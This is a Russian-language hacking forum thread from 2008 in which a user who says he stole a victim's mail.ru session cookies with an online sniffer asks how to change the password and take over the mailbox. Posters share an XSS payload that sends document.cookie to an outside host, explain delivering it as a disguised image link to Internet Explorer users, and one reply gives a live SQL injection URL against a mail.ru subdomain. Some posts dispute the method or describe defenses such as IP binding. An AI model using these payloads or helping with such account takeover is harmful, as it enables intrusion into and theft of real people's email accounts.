Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Войти
 
Страницы: Пред. 1 2 3 4 5 6 След.
RSS
Сниффер на mail.ru [cookies], Помогите поменять пароль!!!
 
Цитата
*** *** пишет:
а ящик можешь угнать расшифровав MD5 хеш из куков
:) :) :) :) :) Полный бред :) :) :)
MD5 не расшифровывается, так как это не не зашифрованная информация, а контрольная сумма!
 
Цитата
Юрий Стахорский пишет:
<script>img = new Image(); img.src = "http://na-s.ru/images/1xss_1.gif?"+document.cookie;</script>

Ещё один бред. Даже пробовать не буду. Яваскрипты удаляются из писем даже с более примитивных сайтах. Ребята, может вы просто приаритесь, а я мешаю ??? А?
:) :) :)
 
Юра ты отрезвей сначала а потом пробуй и все получится, с мд5 чувак тоже выпил, так что как отрезвеете поговорим!
 
Цитата
Сергей Бобошко пишет:
Ещё один бред. Даже пробовать не буду. Яваскрипты удаляются из писем даже с более примитивных сайтах. Ребята, может вы просто приаритесь, а я мешаю ??? А?
Ой, да ладно. То, что explorer пиарится - это ессно. Его право. Ничего плохого в том нет. И верить/пользоваться его скриптами необязательно: ставишь свой сниффер и проверяешь тему на своём тут же заведённом ящике, это всё дело пяти минут. Примитив же, ёптить. Работает. Причём работает судя по всему уже с мая месяца сего года если погуглить предысторию вопроса, а то и раньше.
Изменено: aGGreSSor - 24.12.2008 10:42:22
 
Правельно говориш агресор, никто этими скриптами пользоватся не заставляет, придумайте как лучше замутить и вам тока спасибо скажут...
 
Цитата
explorer пишет:
Ой, да ладно
Ну.... этож всё неправда просто. Да ладно, пусть как хотят.
 
Сергей, если у тебя не получается, это не значит что не у кого не получается, конечно если ты в наглую пихаеш яваскрипты сохраня *.Js или посылаеш в html виде то эта шняга не прокатит, а если заливаш в img,jpg и т.Д то прокатит на ура, так что сперва разберитесь и ненисите пурги...
 
Цитата
Ну.... этож всё неправда просто. Да ладно, пусть как хотят.
Сергей, извините, я с местным киддис-клубом-то и не знаком и не то вообще здесь имел ввиду. Там есть возможность отправить свою открытку, в том смысле что из своего источника. Не знаю считать ли это уязвимостью. =)

Цитата
то эта шняга не прокатит, а если заливаш в img,jpg
Как раз открытие img и jpg различается даже в пределах одного браузера, не говоря уже о FF сравнимо с IE и Opera. У меня на работе например такая программа как WinImage установлена, она ессно все img под себя забиндила. Вопрос киддису на засыпку раз: как себя поведёт IE и как FF при нажатии на вашу любимую ссылку и почему. Вопрос киддису на засыпку два: что за формат такой графический: img и какое имеет отношение к raw. И вопрос киддису на засыпку три: через какое время кидис одержимый любопытством получит в репу и/или условно? )))

Цитата
Правельно говориш агресор, никто этими скриптами пользоватся не заставляет, придумайте как лучше замутить и вам тока спасибо скажут...
Да нет, вы уж как-нибудь сами RTFM по Live HTTP для Firefox и RFC2068 сделайте. Знать где искать - уже половина решения. Где - я сказал. )
 
Во первых вы прокурор чтоли столько вопросов задавать, во вторых я немогу догнать причем тут броузеры и картинки - это какието ваши мысли в слух не по теме, там на 2 или 3 странице есть видос по теме - ознакомтесь и потом делайте выводы по теме, в третьих если вам надо найти какоето дерьмо, то ищите сами мне эта хрень не интересна и в четвертых мне кажется что здесь давно все ясно и тему давно пора закрыть...
 
Цитата
explorer пишет:
я немогу догнать причем тут броузеры и картинки
Браузер, это движок, который выполняет ваш яваскрипт
Код
<script>img = new Image(); img.src = "http://na-s.ru/images/1xss_1.gif?"+document.cookie;</script> 
и отсылает куки в теле запроса к картинке. В принципе не обязательно перенаправлять это на ваш указанный сайт. Можно создать свой сайт на бесплатном хостинге, где можно писать что то на яве или ПШП, чтобы не чернить нормальный домен, и считать эти данные. Это программа в одну строчку.

Даже если Вы скачали куки маилру, даже если не скачивали, а у вас есть свои собственные, просто проведите занимательный эксперимент. Закройте браузер (вкладку, если это Опера или ФФ), и откройте сразу же по новому (заметьте, на сервере за это время даже не убилась сессия), а ваши куки все на месте. И что??? Чудеса на виражах!!! Вы снова увидите форму входа, где надо вводить логин и пароль по новому.

А захочет ли браузер выполнять скрипт внутри картинки? Я вообще то несколько лет занимаюсь разработкой сайтов типа web-mail и блоги, поэтому данная тема вызвала интерес, несмотря на то, что автор ничего в этом не смыслит :) Хочу Вас утешить, что несмотря на то, что уровень моих сайтов пониже чем маилру, но вы никогда не сможете загрузить на сервер или сохранить в почте картинку, которая по сути не картинка. Для этого люди парят мозги и ставят проверки. Но даже если в маилру по запарке об этом забыли. Я не уверен, что какой нибудь из современных браузеров не имеет подобных проверок и кинется выполнять указанный скрипт.

Так что теперь действительно всё понятно.
 
Кстати вот вам пример, склепал уже, хоть и времени на вас нет. Можете повторить у себя

1). Создаете файл с именем img.jpg такого содержания
Код
<script>alert('Я работаю');</script>

Этот скрипт ничего никуда не передает, просто выводет на экран окно сообщения "Я работаю". Если не заработает он, не заработает и ваш пример.

2). В той же директории, где вы создали первый файл, создаете файл с именем test.html и копируете в него этот текст (или сами наберите свой, лишь бы там картинка была)
Код
<html>
<body>
<b>Эта картинка может выполниться, как яваскрипт?</b><br>
<img src='img.jpg'/>
</body>
</html>


Если вы утверждаете, что ваш пример работает, тогда в результате открытия файла test.html должно на экране появиться окно предупреждения "Я работаю". Открываем. Вуаля. Ничего нет. Так что не знаю, что вам там приходило.

Этот пример безопаснее, так что можете потренироваться и на маилру, появится ли там этот мессадж на экране:))))))))))))))
</html>
думаю, что нет :cry:
Просмотрите консоль ошибок, может в яваскрипте где то ошибка и он не хочет выполняться? Нет же. На этой странице нет ошибок. Потому что нечему выполняться.

Факир был пъян, и фокус не удался? А говорили, что я выпил :)
А МД5 - это по сути своей контрольная сумма. Для неуков повторяюсь.
Изменено: Сергей * - 24.12.2008 23:15:14
 
Цитата
Кстати вот вам пример, склепал уже, хоть и времени на вас нет. Можете повторить у себя
Ну дык и не тратьте время. Кидес - дурак, но он практик. А практика с которой носится explorer заключается в том, что вы в вашем примере меняете
Код
<img src='img.jpg'>
на
Код
<a href="http://sniffer.net/img.jpg">Срочно нажми сюда!</a>
. Если получатель дурак, у него стоит IE (даже IE7), то дурак на другом конце получит куки (область видимости ограничена url) хоть mail.ru, хоть чёрта в ступе. Mail.ru в свои кучу кук не закладывает привязок по ip и т.д., соответственно два идиота с одинаковыми куками на разных концах планеты будут лазить по одному и тому же ящику пока один из них не нажмёт Выход (а если не нажмёт, то до окончания срока действия куков сутки). Наши дорогие кидисы пужаются вопросов что будет если у файла с расширением img (jpg зависит от приложения по умолчанию, а img точно никто не менял) поменять расширение на скажем sec. А всё очень просто: в этом случае теги script в теле станут xscript и соответственно никуда вы не пойдёте. Только то что этот скрипт вообще не сильно нужен они не догоняют: как прибили так и держится. ))
 
Цитата
aGGreSSor пишет:
Только то что этот скрипт вообще не сильно нужен
Скрипт не нужен, и это хорошая идея. Но..... Есть одно но... Не стану утверждать, но куки за пределами своего домена кажись невозможно прочитать. Иначе любой переход на другой сайт был бы смертельно опасным для безопасности сайта, с которого переходят. Хотя.... Просто надо проверить. Так что скрипт нужен, но он никогда не стаботает.
 
Цитата
Скрипт не нужен, и это хорошая идея. Но..... Есть одно но... Не стану утверждать, но куки за пределами своего домена кажись невозможно прочитать.
Куки за пределами домена невозможно прочитать - это означает, что мы не можем находясь на сайте mail.ru оперировать куками сайта ya.ru где были до этого. Всё так. Но это не мешает нам вывести пользователю эти куки скажем через alert. Точно также мы можем их грубо говоря вывести наружу и не пользователю. И только того домена в контексте которого отработал скрипт (ограничение области видимости). Иначе катастрофа была бы действительно вселенской.

Проблеме в обед сто лет и решается она занесением в куки таких данных как ip, mac-адрес, разрешение экрана отлично забираемые через DOM и отдаваемые на сторону сервера где их и сличают. Злоумышленик в таком случае не сможет подделать окружение оригинального пользователя, ведь как составить, да заксорить/захэшировать потом куки - дело программиста. Всё это хорошо пока дело не касается масс-медиа. Такого как mail.ru. Тут-то и оказывается что привязка по ip который вообще-то может быть принадлежать прокси не лучший выход для сервиса.

Да, и есть ещё одно хорошее решение: не пользоваться куками (комментарии за скобками =).

Цитата
Иначе любой переход на другой сайт был бы смертельно опасным для безопасности сайта, с которого переходят.

Так и есть. Посмотрите как реализованы переходы наружу ВКонтакте, там есть спецстраница "Если вы нажали на эту ссылку - мы снимаем с себя всякую ответственность". Вы встречаетесь с этой спецстраницей всякий раз как только попытаетесь перейти с сайта ВКонтакте на любой другой сайт. Очень грамотно.

Цитата
Так что скрипт нужен, но он никогда не стаботает.
Он сработает без всяких вопросов в IE7 и с дополнительным запросом в Firefox 3.0.5. Просто запишите
Код
<script>alert('test');</script>
в текстовый файл, поменяйте расширение на img и откройте получившийся файл в браузере. Такое открытие и есть цель всех плясок с бубном. Как видите, вполне доступно детям. )
Изменено: aGGreSSor - 25.12.2008 00:32:43
 
XD смешно читать какую ерунду вы развели здесь, все работает , а вы все делаете намеренно через ж..Пу чтоб неработало, ладно переписывайтесь дальше и лечите друг другу пургу, небуду мешать...
 
Цитата
explorer пишет:
XD смешно читать какую ерунду вы развели здесь, все работает , а вы все делаете намеренно через ж..Пу чтоб неработало, ладно переписывайтесь дальше и лечите друг другу пургу, небуду мешать...
Указанный вами пример вообще не работает. Такое письмо, как вы привели вообще не доходит на ящик маилру. Я пробовал. Они такую пургу не принимают.
 
Цитата
explorer пишет:

                                                               Здрасте всем, у меня такой вопрос, я спер кукки онлайн сниффером www.na-s.ru с ящика жертвы на сайте mail.ru, ввел их в опере, всё получилось и я вошол в почту своей жертвы, но я незнаю пароль и немогу поменять ничего в ящике незная пароля, подскажите есть ли способы изменить пароль или как нибудь подругому угнать ящик, спасибо зарание!

explorer приветик =)
могу те дать подсказку покруче если выйдешь на пральный путь то получишь много че интересного =)
если у тя канечна моска хватет
вот попробуй раскрути скульинж на майле правда домен третьего уровня но я до баралсь с этой фиговины до win.mail.ru =)))

http://list.mail.ru/fast-bin/olympic_forecast_view.bat?id=-10690+union+select+1,database(),version(),user(),null/*
 
Только ради тебя поприкалываюсь )) с этой штучкой!
 
Цитата
explorer пишет:

                                                               Только ради тебя поприкалываюсь )) с этой штучкой!

спсибки конечно но мне не до етого =))))
 
вот по-моему неплохая статья о реальности эксплуатации
Изменено: brat - 28.12.2008 00:28:25
Страницы: Пред. 1 2 3 4 5 6 След.
Читают тему